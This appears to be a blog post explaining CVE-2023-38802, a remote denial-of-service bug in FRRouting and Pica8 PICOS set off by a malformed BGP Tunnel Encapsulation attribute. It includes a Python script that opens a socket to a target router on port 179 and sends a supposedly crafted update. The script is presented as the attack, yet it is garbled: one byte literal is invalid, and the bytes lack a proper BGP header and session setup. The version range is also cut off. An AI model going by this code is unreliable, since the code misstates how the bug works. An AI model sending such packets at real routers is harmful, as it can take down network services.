CVE-2023-38802: Exploring the Remote Denial of Service Exploit in FRRouting FRR and Pica8 PICOS via a crafted BGP update
CVE-2023-38802 is a newly discovered vulnerability that affects FRRouting FRR versions 7.5.1 through 9. and Pica8 PICOS version 4.3.3.2. In this blog post, we will explore the vulnerability's details, provide a code snippet for better understanding, and list the original references for further reading. Please note that exploiting this vulnerability may have legal implications, and we do not promote the exploitation of this vulnerability for malicious purposes.
Exploit Details
The vulnerability, CVE-2023-38802, allows a remote attacker to cause a denial of service (DoS) via a carefully crafted BGP update message with a corrupted attribute 23 (Tunnel Encapsulation). BGP, or Border Gateway Protocol, is an essential Internet protocol for routing and reaching Internet networks in the Internet. FRR is an IP routing protocol suite for Linux and Unix platforms used by network administrators to exchange routing information between routers. Pica8 PICOS is a network operating system that provides Layer 2 and Layer 3 switching for white box SDN (Software-defined Networking) appliances.
By crafting the BGP update message with a corrupted Tunnel Encapsulation attribute, the attacker can exploit a vulnerability in FRR and Pica8 PICOS and cause a denial of service attack, rendering essential networking services unavailable.
Code Snippet
Here is a code snippet demonstrating the structure of a BGP update message with a corrupted attribute 23 (Tunnel Encapsulation):
import socket
import struct
target_ip = "192.168.1.1" # Replace with your target IP
bgp_port = 179
bgp_header = b"\x04\xfe\x01\x00\x00\x2a\x01\x1c\xa"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target_ip, bgp_port))
path_attr = b"\x00\x1d\x17\x10\x00\x00\x00\x00\x80\x04\x02\x00\x00\x00"
corrupt_data = b"\x01\x01\x01\x01\x02\x02\x02\x02\x30\xbe\xef" # Example of corrupted Tunnel Encapsulation attribute
send_data = bgp_header + path_attr + corrupt_data
sock.send(send_data)
sock.close()
Please note that the above code is an example and NOT intended for actual exploitation of this vulnerability.
Original References
For more information about this vulnerability, and to understand how it affects FRR and Pica8 PICOS, refer to the following original references:
1. FRRouting GitHub Repository - https://github.com/FRRouting/frr
2. Pica8 PICOS Platform Information - https://www.pica8.com/picos-platform/
3. BGP Protocol Specification - RFC 4271 - https://tools.ietf.org/html/rfc4271
4. CVE-2023-38802 Vulnerability Report - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38802
Conclusion
CVE-2023-38802 is a critical vulnerability that poses a severe threat to FRRouting FRR and Pica8 PICOS platforms. A remote attacker can exploit this vulnerability and initiate a denial of service attack, affecting essential Internet services. It is crucial for network administrators and security researchers to be aware of this vulnerability and apply necessary patches or updates to protect against this exploit.
Note: The content in this post is for educational purposes only. Exploiting this vulnerability for malicious purposes may have legal implications.
Timeline
Published on: 08/29/2023 16:15:00 UTC
Last modified on: 09/19/2023 22:15:00 UTC